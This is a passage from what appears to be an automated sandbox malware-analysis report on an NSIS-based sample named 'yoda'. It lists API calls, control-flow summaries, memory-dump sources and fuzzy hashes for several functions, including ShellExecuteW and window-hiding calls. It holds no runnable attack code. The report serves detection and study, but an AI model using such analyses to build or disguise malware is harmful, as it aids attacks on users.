                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(00445D80,00427176,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                • lstrlenW.KERNEL32(004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                • lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                • SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427176,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2740478559-0
                                                                                                                                                                                                                                                                • Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                • Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98
                                                                                                                                                                                                                                                                Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 729 402713-40273b call 406035 * 2 734 402746-402749 729->734 735 40273d-402743 call 40145c 729->735 737 402755-402758 734->737 738 40274b-402752 call 40145c 734->738 735->734 741 402764-40278c call 40145c call 4062cf WritePrivateProfileStringW 737->741 742 40275a-402761 call 40145c 737->742 738->737 742->741
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                • WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: PrivateProfileStringWritelstrcpyn
                                                                                                                                                                                                                                                                • String ID: %TechnoBecome%$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                                                                                                                                                                                                                                • API String ID: 247603264-3880727211
                                                                                                                                                                                                                                                                • Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                • Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD
                                                                                                                                                                                                                                                                Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 750 4021b5-40220b call 40145c * 4 call 404f9e ShellExecuteW 761 402223-4030f2 call 4062cf 750->761 762 40220d-40221b call 4062cf 750->762 762->761
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00427176,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00427176,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                                                                                                                                                                                                  • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                                                                                                                                                                                                • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                                                                                                                                                                                                                                • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                                                                                                                                                                                                                                • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                                                                                                                                                                                                                                • API String ID: 3156913733-2180253247
                                                                                                                                                                                                                                                                • Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                • Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138
                                                                                                                                                                                                                                                                Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 770 405eab-405eb7 771 405eb8-405eec GetTickCount GetTempFileNameW 770->771 772 405efb-405efd 771->772 773 405eee-405ef0 771->773 775 405ef5-405ef8 772->775 773->771 774 405ef2 773->774 774->775
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 00405EC9
                                                                                                                                                                                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: CountFileNameTempTick
                                                                                                                                                                                                                                                                • String ID: nsa
                                                                                                                                                                                                                                                                • API String ID: 1716503409-2209301699
                                                                                                                                                                                                                                                                • Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                • Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98
                                                                                                                                                                                                                                                                Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                control_flow_graph 776 402175-40218b call 401446 * 2 781 402198-40219d 776->781 782 40218d-402197 call 4062cf 776->782 783 4021aa-4021b0 EnableWindow 781->783 784 40219f-4021a5 ShowWindow 781->784 782->781 786 4030e3-4030f2 783->786 784->786
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$EnableShowlstrlenwvsprintf
                                                                                                                                                                                                                                                                • String ID: HideWindow
                                                                                                                                                                                                                                                                • API String ID: 1249568736-780306582
                                                                                                                                                                                                                                                                • Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                • Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D
                                                                                                                                                                                                                                                                Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: MessageSend
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3850602802-0
                                                                                                                                                                                                                                                                • Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                • Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C
                                                                                                                                                                                                                                                                Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: File$AttributesCreate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 415043291-0
                                                                                                                                                                                                                                                                • Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                • Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15
                                                                                                                                                                                                                                                                Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
                                                                                                                                                                                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                • Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                • Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19
                                                                                                                                                                                                                                                                Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                • Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                • Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4
                                                                                                                                                                                                                                                                Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                  • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1776574336.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776556543.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776612160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776631758.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1776754907.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_yoda.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 4115351271-0
                                                                                                                                                                                                                                                                • Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
